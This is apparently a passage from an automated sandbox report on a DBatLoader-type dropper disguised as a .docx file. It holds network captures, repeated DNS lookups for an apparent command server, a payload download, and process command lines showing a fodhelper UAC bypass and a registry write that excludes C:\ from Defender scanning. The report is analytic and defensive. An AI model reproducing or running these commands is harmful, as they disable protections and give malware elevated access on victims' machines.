                                                                            Jul 3, 2024 08:56:53.301548958 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.301556110 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.301593065 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.302050114 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.302073002 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.302104950 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.302112103 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.302139044 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.302156925 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.302589893 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.302603960 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.302653074 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.302659035 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.302695990 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.303303957 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.303323030 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.303371906 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.303380966 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.303417921 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.303894997 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.303910017 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.303960085 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.303968906 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.304004908 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.360569000 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.360590935 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.360693932 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.360713005 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.360754967 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.361697912 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.361712933 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.361773014 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.361787081 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.361828089 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.391103029 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.391123056 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.391242027 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.391277075 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.391321898 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.391644955 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.391659975 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.391732931 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.391740084 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.391778946 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.392258883 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.392273903 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.392348051 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.392354012 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.392394066 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.393034935 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393052101 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393115997 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.393122911 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393168926 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.393630028 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393645048 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393695116 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.393702030 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393737078 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.393872023 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393887043 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393918037 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.393924952 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.393953085 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.393978119 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.450978041 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.450999022 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.451086044 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.451107979 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.451162100 CEST49700443192.168.2.7108.170.55.202
                                                                            Jul 3, 2024 08:56:53.451662064 CEST44349700108.170.55.202192.168.2.7
                                                                            Jul 3, 2024 08:56:53.451680899 CEST44349700108.170.55.202192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 3, 2024 08:56:51.785564899 CEST | 1.1.1.1 | 192.168.2.7 | 0xae16 | No error (0) | wcmanagers.com |  | 108.170.55.202 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:01.060977936 CEST | 1.1.1.1 | 192.168.2.7 | 0xabba | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:06.166323900 CEST | 1.1.1.1 | 192.168.2.7 | 0x42e3 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:11.242602110 CEST | 1.1.1.1 | 192.168.2.7 | 0x68b0 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:16.382141113 CEST | 1.1.1.1 | 192.168.2.7 | 0x4ec4 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:20.418603897 CEST | 1.1.1.1 | 192.168.2.7 | 0xf0b1 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:25.465373039 CEST | 1.1.1.1 | 192.168.2.7 | 0x7776 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:26.060957909 CEST | 1.1.1.1 | 192.168.2.7 | 0xbf28 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jul 3, 2024 08:57:28.575367928 CEST | 1.1.1.1 | 192.168.2.7 | 0x1c0d | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:33.648858070 CEST | 1.1.1.1 | 192.168.2.7 | 0x4647 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:39.037692070 CEST | 1.1.1.1 | 192.168.2.7 | 0x5004 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:43.461863041 CEST | 1.1.1.1 | 192.168.2.7 | 0xda81 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:48.615583897 CEST | 1.1.1.1 | 192.168.2.7 | 0x3f27 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:53.468645096 CEST | 1.1.1.1 | 192.168.2.7 | 0xb1de | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:57:58.307159901 CEST | 1.1.1.1 | 192.168.2.7 | 0x6185 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:03.319127083 CEST | 1.1.1.1 | 192.168.2.7 | 0xb730 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:08.302874088 CEST | 1.1.1.1 | 192.168.2.7 | 0x22ff | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:13.303615093 CEST | 1.1.1.1 | 192.168.2.7 | 0xcc09 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:18.305335999 CEST | 1.1.1.1 | 192.168.2.7 | 0x9f10 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:23.307399988 CEST | 1.1.1.1 | 192.168.2.7 | 0x24e8 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:28.305159092 CEST | 1.1.1.1 | 192.168.2.7 | 0x4004 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:33.340440989 CEST | 1.1.1.1 | 192.168.2.7 | 0x7c0 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:38.306010962 CEST | 1.1.1.1 | 192.168.2.7 | 0x8e2 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:43.309531927 CEST | 1.1.1.1 | 192.168.2.7 | 0xa794 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:48.303158045 CEST | 1.1.1.1 | 192.168.2.7 | 0xaccb | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:53.306932926 CEST | 1.1.1.1 | 192.168.2.7 | 0x330e | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:58:58.305921078 CEST | 1.1.1.1 | 192.168.2.7 | 0x7769 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:03.305491924 CEST | 1.1.1.1 | 192.168.2.7 | 0xcd82 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:08.303704977 CEST | 1.1.1.1 | 192.168.2.7 | 0xe0de | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:13.308562040 CEST | 1.1.1.1 | 192.168.2.7 | 0xfdec | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:18.312145948 CEST | 1.1.1.1 | 192.168.2.7 | 0x115d | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:23.303596020 CEST | 1.1.1.1 | 192.168.2.7 | 0x9b22 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:28.303502083 CEST | 1.1.1.1 | 192.168.2.7 | 0xffec | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:33.303508997 CEST | 1.1.1.1 | 192.168.2.7 | 0xbef | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:38.303596973 CEST | 1.1.1.1 | 192.168.2.7 | 0x77b5 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:43.428184032 CEST | 1.1.1.1 | 192.168.2.7 | 0x30c8 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:48.360872984 CEST | 1.1.1.1 | 192.168.2.7 | 0xcf8a | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:53.302922964 CEST | 1.1.1.1 | 192.168.2.7 | 0x650 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 08:59:58.342658997 CEST | 1.1.1.1 | 192.168.2.7 | 0xf35e | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:03.304307938 CEST | 1.1.1.1 | 192.168.2.7 | 0xd7ec | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:08.303471088 CEST | 1.1.1.1 | 192.168.2.7 | 0xe10 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:13.306945086 CEST | 1.1.1.1 | 192.168.2.7 | 0x6cb | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:18.303373098 CEST | 1.1.1.1 | 192.168.2.7 | 0x1ce0 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:23.583026886 CEST | 1.1.1.1 | 192.168.2.7 | 0x3ba0 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:28.304403067 CEST | 1.1.1.1 | 192.168.2.7 | 0xda09 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:33.329210043 CEST | 1.1.1.1 | 192.168.2.7 | 0x2f0d | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:38.303339958 CEST | 1.1.1.1 | 192.168.2.7 | 0x4beb | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:43.304078102 CEST | 1.1.1.1 | 192.168.2.7 | 0xedb4 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:48.305927038 CEST | 1.1.1.1 | 192.168.2.7 | 0x7473 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:53.303270102 CEST | 1.1.1.1 | 192.168.2.7 | 0x2869 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:00:59.892136097 CEST | 1.1.1.1 | 192.168.2.7 | 0x30e6 | Name error (3) | www.vipguyclassproject2024.space | none | none | A (IP address) | IN (0x0001) | false
                                                                            • wcmanagers.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 108.170.55.202 | 443 | 4220 | C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-03 06:56:52 UTC | 167 | OUT | GET /Er9/233_Pyemdbrdpps HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wcmanagers.com
2024-07-03 06:56:52 UTC | 365 | IN | HTTP/1.1 200 OK
Connection: close
last-modified: Sun, 30 Jun 2024 22:39:58 GMT
accept-ranges: bytes
content-length: 1071492
date: Wed, 03 Jul 2024 06:56:52 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

                                                                            Target ID:0
                                                                            Start time:02:56:48
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'085'440 bytes
                                                                            MD5 hash:B9DA5A47E1E68EF90C075DC14F8E2037
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\Libraries\drbdmeyP.pif
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\Public\Libraries\drbdmeyP.pif
                                                                            Imagebase:0x400000
                                                                            File size:68'096 bytes
                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
                                                                            Imagebase:0x7ff7b1750000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff75da10000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                            Imagebase:0x7ff669ec0000
                                                                            File size:35'328 bytes
                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:02:56:54
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:02:56:54
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                                                                            Imagebase:0x7ff669ec0000
                                                                            File size:35'328 bytes
                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:14
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:15
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                                                                            Imagebase:0x7ff669ec0000
                                                                            File size:35'328 bytes
                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:17
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:18
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                                                                            Imagebase:0x7ff669ec0000
                                                                            File size:35'328 bytes
                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:21
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:22
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\xkn.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                                                                            Imagebase:0x7ff6c8910000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Has exited:true

                                                                            Target ID:23
                                                                            Start time:02:56:57
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:24
                                                                            Start time:02:56:57
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\ger.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                                                                            Imagebase:0x7ff7e0a00000
                                                                            File size:77'312 bytes
                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Has exited:true

                                                                            Target ID:28
                                                                            Start time:02:56:58
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF
                                                                            Imagebase:0xc20000
                                                                            File size:29'184 bytes
                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:31
                                                                            Start time:02:56:58
